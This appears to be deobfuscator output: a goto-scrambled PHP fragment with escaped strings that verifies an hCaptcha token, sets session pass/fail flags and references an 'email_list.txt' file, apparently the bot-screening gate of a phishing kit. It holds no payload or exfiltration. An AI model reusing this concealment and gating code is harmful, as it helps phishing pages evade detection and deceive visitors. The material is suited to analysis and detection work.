require "\x66\165\x6e\143\x2e\x70\150\160";
goto xHgQWN08kFFyZT;
evfNnQB3vlke84:
$responseData = json_decode($verifyCaptcha, true);
goto RBxXsVWC3WJUwi;
LNR1kGiCIv4VTq: PGGHqH6pWRQcig:
goto bSYL6RY3LfCVGo;
GSAIRlLFvqjnr1:
goto GUcgbRc1JIkIpH;
goto c7JAxbYopDZZjD;
LD6bStVDRdwh3_:
$hcapData = array("\163\x65\143\x72\x65\164" => $hCaptchaSecret, "\x72\145\x73\160\x6f\x6e\163\x65" => $_POST["\x68\55\x63\141\160\x74\143\x68\x61\55\162\x65\x73\x70\157\x6e\163\x65"]);
goto eme5XLe9Z2EAyv;
i8lAeNLAFapZGO:
goto fBH7WWfSaVsZHL;
goto ZafS2UHVuemLBh;
uy805VVlHWrx7B: uPqiUztN83vMaz:
goto z9_fJvH70zfb8g;
SedHj9lAcZnBRi:
$listEmail = "{$src}\57\145\155\141\x69\x6c\137\154\151\x73\x74\x2e\x74\170\x74";
goto LyWiUuv0ldfi9w;
Q1sUno9Ihrxl3x:
$verifyCaptcha = mc10v_SMX7WhPK("\x68\x74\x74\x70\x73\x3a\57\57\150\143\x61\x70\164\x63\150\141\56\x63\x6f\155\x2f\163\151\164\145\166\x65\x72\151\x66\171", $hcapData, $h_header);
goto uLHdOe7jZZIjUE;
rTyHDGVYGe5i0X:
session_start();
goto A8U8wUusFXb422;
YSwXFX_78q0QL1:
$_SESSION["\160\141\x73\163"] = "\x70\141\163\x73";
goto NO0DHauLAGm182;
kd_K5ADC4obR7f: s6lyLoMVBx_4Ye:
goto Ah0246c8k7PevU;
uTLf9JiTdeCLxd:
$_SESSION["\146\141\151\x6c\x65\144"] = "\x66\141\x69\x6c\145\x64";
goto lrE7RBG2gjBwux;
b3c0fQS7cLQCQF:
if (!isset($_POST["\x63\x61\x70\x74\x63\x68\141\55\x62\157\x78"])) {
goto TlXK3QoG9m2PcP;
}
goto YSwXFX_78q0QL1;
JD6w3jELwKEfYZ:
$_SESSION["\163\x74\141\162\x74"] = "\x73\x74\x61\x72\164";
goto jImMDUQJVRC3g1;
jImMDUQJVRC3g1: rYGrr9PDEccOd2:
goto X5zk7OE_YgQncL;
AHlG9eAfxn2XDb: lAfvYdYZyk7WHo:
goto Kn_LXHEzEkdB3l;
X5zk7OE_YgQncL: g9vKSy9gveB7NQ:
Function Calls
None |
Stats
MD5 | 27faa0d57390390d2a4f61878590e25f |
Eval Count | 0 |
Decode Time | 86 ms |